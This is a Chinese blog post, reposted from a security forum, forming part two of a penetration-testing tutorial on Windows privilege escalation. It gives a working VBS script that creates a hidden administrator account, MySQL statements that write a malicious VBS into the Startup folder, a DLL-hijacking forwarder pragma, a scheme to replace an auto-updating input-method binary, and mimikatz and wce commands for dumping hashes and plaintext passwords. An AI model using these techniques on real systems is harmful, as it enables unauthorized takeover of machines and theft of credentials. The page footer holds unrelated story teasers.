【吐血撰写】渗透测试技术基础——提权技术基础大全二)

原文:http://bbs.ichunqiu.com/thread-8390-1-1.html?from=jianshu

问:被删除的储存过程如何被恢复?
一般管理员会删除储存过程,在我们手动恢复储存过程时,经常会发生各种错误。我们要对症下药,根据报错信息,找到问题所在。
0x03 权限继承类提权---基于DLL劫持的WebShell提权
什么是DLL劫持

DLL劫持的原因。
1、Windows的DLL称为动态链接库,动态链接库技术的本质实际上是将可执行文件与库文件分离,DLL库文件通过导出表提供API接口,PE加载器通过exe文件的导入表加载相应的DLL,并根据exe文件中的INT查询DLL中的函数地址,同时写入IAT。
2、当PE加载器根据exe文件的导入表加载DLL文件时,它会按照程序的当前目录-->system32目录-->windows目录-->

ATH环境变量设置的目录来依次查找要加载的DLL文件。因此,我们可以在伪造一个导入表同名的DLL文件,放置到exe文件的目录中,让PE加载器加载我们伪造的DLL文件,从而实现劫持。
3、DLL的转发器功能为我们提供了必要的条件,所谓DLL转发器功能是将对某个DLL文件的导出函数调用转到另一个DLL文件的导出函数中。类似于下面的代码:
<font size="3">xxx.dll</font>
<font size="3">#pragma comment(linker, "/EXPORT:MessageBoxA = user32.MessageBoxA")</font>

除了lpk.dll劫持,常常被黑客们使用的还有针对专门的第三方软件的个性化dll。


0x04 权限继承类提权
开机启动项提权?
windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的
关于自动化脚本?



不会写vbs脚本?
<font size="3">Set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","nsfocus") '建立用户
od.SetPassword "Nsf0cus123" '设置密码
od.SetInfo
Set of=GetObject(os&"/nsfocus",user) '得到用户
oe.add os&"/nsfocus"
</font>

保存成*.vbs,一般cmd中使用如下格式执行:
<font size="3">C:>cscript *.vbs
</font>

我们有vbs之后的事......
<font size="3"><div style="line-height: 1.5;"></font>

TIPS:
1.通常我们会主动去重启服务器,利用远程溢出(Ms12-020)或社工手法等。
2.写入脚本的时候也常常用数据库去写入
*连接mysql数据库后执行
1.创建a表列名cmd并写入文本:
create table a (cmd text);

2.一条一条执行:
<font size="3">insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); </font>
<font size="3">insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0) " ); </font>
<font size="3">insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " );</font>

3.建立好列并写入数据了,接着就是导出了。
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\这个是启动目录。

使用命令:select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs"

成功导出vbs到启动目录

替换文件提权
搜狗拼音文件夹权限漏洞


D:\Program Files (x86)\SogouInput\7.0.0.9553\PinyinUp.exe

输入法定时联网,更新词库,检查版本等信息,自动执行。替换成我们想要的:加账号,读密码等提权操作。举一反三,很多类似的自动运行的应用程序。获取高权限账号之后获取Windows管理员账号下载系统的 sam文件,(“%windir%system32\config\”)然后用SamInside等软件进行破解,只要能拿到,肯花时间,就一定可以破解。

复制不出来怎么办?——“冰刃(Iceword)”

获取FTP账号
渗透过程中我们可能会遇到目标服务器上有ftp软件,如果里面保存了重要的记录,那就是意想不到的收获,让它把我们带到内网更深处去。很多ftp软件的登录信息都会保存在本地,有些在软件根目录,bin,ini等文件中,有些则需要从软件本身导出。
这里我们以flashfxp为例

读取操作系统账户的密码
渗透过程中,为了下一步渗透,我们常常会需要管理员的操作系统密码、数据库密码、常用密码等信息。获取操作系统密码已经有很多工具可以办到了,那么,为什么我们可以利用工具轻松获取到操作系统的常用密码呢?
通常是从内存里抓出active账号的 lm hash和ntlm hash
介绍几款工具
Wce.exe

<div>wce.exe -w抓明文hash</div><div>wce.exe -l 列出账号NTLM的hash</div><div>wce.exe -s Hash注入</div>

法国神器:Mimikatz

获得缓存中的Hash值

1 cls 清屏
2.exit 退出
3.version 查看mimikatz的版本
4.system::user 查看当前登录的系统用户
5.system::computer 查看计算机名称
6.process::list 列出进程
7.process::suspend 进程名称 暂停进程
8.process::stop 进程名称 结束进程
9.process::modules 列出系统的核心模块及所在位置
10.service::list 列出系统的服务
11.service::remove 移除系统的服务
12.service::start stop 服务名称 启动或停止服务
13.privilege::list 列出权限列表
14.privilege::enable 激活一个或多个权限
15.privilege::debug 提升权限
16.nogpo::cmd 打开系统的cmd.exe
17.nogpo::regedit 打开系统的注册表
18.nogpo::taskmgr 打开任务管理器
19.ts::sessions 显示当前的会话
20.ts::processes 显示进程和对应的pid情况等
21.sekurlsa::wdigest 获取本地用户信息及密码
22.sekurlsa::tspkg 获取tspkg用户信息及密码
23.sekurlsa::logonPasswords 获登陆用户信息及密码

获取浏览器中“保存下来”的密码
chrome://settings/passwords

其实可以一次性读出各种浏览器保存下来的密码,
推荐给大家一个神器的小工具:
BrowserPasswordDump
它具备了其他优秀渗透小工具的优点,可以在webshell中执行,利用追加符号查看结果。而且轻量,速度快。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 160,165评论 4 364
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,720评论 1 298
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,849评论 0 244
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,245评论 0 213
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,596评论 3 288
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,747评论 1 222
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,977评论 2 315
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,708评论 0 204
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,448评论 1 246
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,657评论 2 249
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,141评论 1 261
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,493评论 3 258
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,153评论 3 238
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,108评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,890评论 0 198
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,799评论 2 277
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,685评论 2 272

推荐阅读更多精彩内容